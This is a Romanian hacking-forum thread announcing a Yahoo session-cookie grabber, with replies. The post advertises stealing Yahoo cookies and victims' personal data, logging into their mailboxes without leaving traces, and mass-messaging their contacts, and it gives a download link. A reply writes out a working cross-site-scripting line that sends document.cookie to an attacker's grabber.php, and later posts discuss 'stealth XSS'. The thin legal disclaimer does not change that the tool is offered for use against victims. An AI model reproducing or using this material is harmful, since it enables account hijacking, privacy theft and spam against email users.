Jump to content
Guest Nemessis

[RST] Professional Yahoo Cookie Grabber [de actualitate]

Recommended Posts

Guest Nemessis

Professional Yahoo Cookie Grabber este dupa cum spune si denumirea un tool pentru capturarea cookieurilor de Yahoo.

Ce facilitati detine acest grabber?

Versiunea publica:

- o interfata placuta de tip hi-tech

- extrage odata cu cookie avatarul userului

- extrage odata cu cookie ip-ul userului

- extrage odata cu cookie id-ul userului

- scrie data si ora la care a fost capturat cookie

- contine user data - informatii decriptate din cookie ce ne dau detalii despre urmatoarele:

1. sex (gender)

2. anul nasterii (birth year)

3. Limba (language)

4. zip code

5. tara (country)

- cookie data - valorile Y si T din cookie sunt salvate separat in doua text box pentru a va fi mai usor sa le copiati

- link direct de logare - daca dati click pe id-ul capturat veti fi logati automat pe mailul userului fara a mai fi nevoie de introducerea valorilor Y si T in diferite editoare gen add n edit cookies.

- logarea automata se face direct catre mail classic. Daca userul al carui cookie il folositi are setata interfata mail beta cu ajutorul linkului direct de logare veti intra automat pe interfata clasica in acest fel evitand ca webmessengerul prezent in mail beta sa se incarce si sa apareti online.

- logarea automata nu modifica setarile interfetei puse default de catre user. Se creeaza o singura sesiune cu interfata clasica iar cand userul intra pe mail folosind user + parola va vedea interfata pe care si-a setat-o el din start. Astfel nu vor ramane urme ale prezentei voastre in acel cont.

- cookie se trimite automat in mailul pe care il setati voi din grabber.php (linia $to = 'youremail@youremail.com'; unde youremail@youremail.com trebuie schimbat cu mailul vostru)

- links:

1. Link catre contul de hi5 (daca exista cont de hi5 creeat pe acel mail)

2. Link catre contul de myspace (daca exista cont de myspace creeat pe acel mail)

3. Link catre Yahoo! profiles pentru a vizualiza profilul victimei

4. Link catre Yahoo! search pentru cautarea informatiilor despre acel id aflate pe web

5. Link catre Google! search pentru cautarea informatiilor despre acel id aflate pe web

Bug-uri: versiunea mailer (cea care va trimite cookies direct in mail) are probleme de grafica. Veti primi totusi informatiile necesare in mailul vostru dar aspectul mesajului este neplacut. Probabil aceasta problema este doar cu Yahoo! mail care filtreaza anumite tag-uri

Versiunea privata:

- prelungirea duratei de functionare a cookieurilor pentru a inlatura limita de 24 ore

- mass message in lista de Yahoo! messenger

- salvare address book cu un singur click

- mass mail in lista de contacte

- o interfata placuta de tip hi-tech

- extrage odata cu cookie avatarul userului

- extrage odata cu cookie ip-ul userului

- extrage odata cu cookie id-ul userului

- scrie data si ora la care a fost capturat cookie

- contine user data - informatii decriptate din cookie ce ne dau detalii despre urmatoarele:

1. sex (gender)

2. anul nasterii (birth year)

3. Limba (language)

4. zip code

5. tara (country)

- cookie data - valorile Y si T din cookie sunt salvate separat in doua text box pentru a va fi mai usor sa le copiati

- link direct de logare - daca dati click pe id-ul capturat veti fi logati automat pe mailul userului fara a mai fi nevoie de introducerea valorilor Y si T in diferite editoare gen add n edit cookies.

- logarea automata se face direct catre mail classic. Daca userul al carui cookie il folositi are setata interfata mail beta cu ajutorul linkului direct de logare veti intra automat pe interfata clasica in acest fel evitand ca webmessengerul prezent in mail beta sa se incarce si sa apareti online.

- logarea automata nu modifica setarile interfetei puse default de catre user. Se creeaza o singura sesiune cu interfata clasica iar cand userul intra pe mail folosind user + parola va vedea interfata pe care si-a setat-o el din start. Astfel nu vor ramane urme ale prezentei voastre in acel cont.

- cookie se trimite automat in mailul pe care il setati voi din grabber.php (linia $to = 'youremail@youremail.com'; unde youremail@youremail.com trebuie schimbat cu mailul vostru)

- links:

1. Link catre contul de hi5 (daca exista cont de hi5 creeat pe acel mail)

2. Link catre contul de myspace (daca exista cont de myspace creeat pe acel mail)

3. Link catre Yahoo! profiles pentru a vizualiza profilul victimei

4. Link catre Yahoo! search pentru cautarea informatiilor despre acel id aflate pe web

5. Link catre Google! search pentru cautarea informatiilor despre acel id aflate pe web

Versiunea privata nu va fi disponibila decat pentru cei care au contribuit la developmentul acestui grabber. Toate facilitatile exista deja, inclusiv cea de prelungire a vietii unui cookie (multumita lui Slick este posibil acest lucru).

Atentie: nu stergeti urmatorul cod din grabbed.html fara sa aveti un minim de cunostinte html pentru ca puteti strica grafica:

<title>- ::::: [R]omanian [S]ecurity [T]eam | Yahoo Professional Cookie Grabber Beta 2 
- Public Version ::::: -
</title>
<body bgcolor="#000000">


<a href="http://rstcenter.com">
[img=http://rstcenter.com/images/banner.jpg]</a></p>
<html>
<head>

Echipa care a creeat acest grabber:

- BanKai - scriptul php

- ahead - grafica

- kw3rln - sursa grabberului cu id

- Slick - prelungirea duratei de folosire a unui cookie (private version)

- Nemessis - idee, project manager

Pentru buguri, intrebari si nelamuriri strict la subiect puteti posta in acest topic.

Nota: acest tool este doar o demonstratie de programare web. Este ilegal si NU AVETI VOIE sa il folositi pentru a fura/accesa datele personale ale altor oameni decat daca aveti acordul acestora. Folositi acest tool doar pentru teste. Echipa RST nu se face responsabila daca nu respectati aceasta regula sau daca incalcati legea prin faptele voastre.

Screenshot: http://img117.imageshack.us/img117/3514/prezentareic2.png

Download link: http://rapidshare.com/files/81183578/RST_Professional_Yahoo_Cookie_Grabber.zip.html

Mai multe detalii despre cum poate fi folosit: http://rstcenter.com/forum/cum-sa-iti-ascunzi-xss-si-yahoo-xss-t8101.rst (updatat la zi)

Link to comment
Share on other sites

Eh nu mi se pare nimic in plus fata de celalalt,inafara ca arate cateva informatii in plus :roll: .Daca era si ala facut de slick sa prelungeasca valabilitatea unui cookie era ceva in plus si frumos..dar daca nu vreti sa le dati :D asta e.Anyway felicitari pentru munca.

Link to comment
Share on other sites

ai setat permisiune de scriere pentru grabbed.html ?/ ( chmod 777 )

da, am setat . mi a mers grabberul vechi. stiu cum si ce sa fac in mare. cum ar trebuii sa arate exact css3.js ??? ca poate gresesc acolo

al meu arata asa: location.replace ("http://siteulmeu.com/phpgrabber/grabber.php?cookie=" + escape(document.cookie));

Link to comment
Share on other sites

Vedeti ca e vulnerabil la XSS la ZipCode si la Language.

Va sugerez sa salvati informatiile "furate" intr-un fisier txt, nu HTML, si sa il salvati apoi ca HTML si sa il vizualizati.

Oricum, si asa poate fi folosit de un posibil atacator ca sa va fure cookie :P.

Link to comment
Share on other sites

Guest Nemessis

Cookie este "transat" pentru a da doar valorile Y si T. Un atacator nu poate sa trimita in grabber niciun script pentru ca nu ar trece de "transarea" cookieului. Poti incerca sa o faci tw8 si lasa-mi un mesaj cu rezultatele :)

Link to comment
Share on other sites

Guest BanKai
Vedeti ca e vulnerabil la XSS la ZipCode si la Language.

Va sugerez sa salvati informatiile "furate" intr-un fisier txt, nu HTML, si sa il salvati apoi ca HTML si sa il vizualizati.

Oricum, si asa poate fi folosit de un posibil atacator ca sa va fure cookie :P.

1. folosind stealth xss VICTIMA NU ARE DE UNDE SA STIE UNDE ESTE GRABBERUL

2. chiar daca victima afla unde e grabberul trebe sa treaca de referer test ca sa poata injecta cookie malformat in el

3. DACA REUSHESHTE SA FACA ASTA CE O SA FACA ? SA IMI FURE COOKIEUL DE LA SITEUL UNDE E HOSTAT GRABBERUL ? WTF !?

incercatzi sa va folositzi mintea inainte de a face posturi ratate si tu si vladiii

dupa o zi de release si deja nu va mai sufar cu intrebarile si posturile idioate ... parerea mea e ca mai bine nu il lansam si gata

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...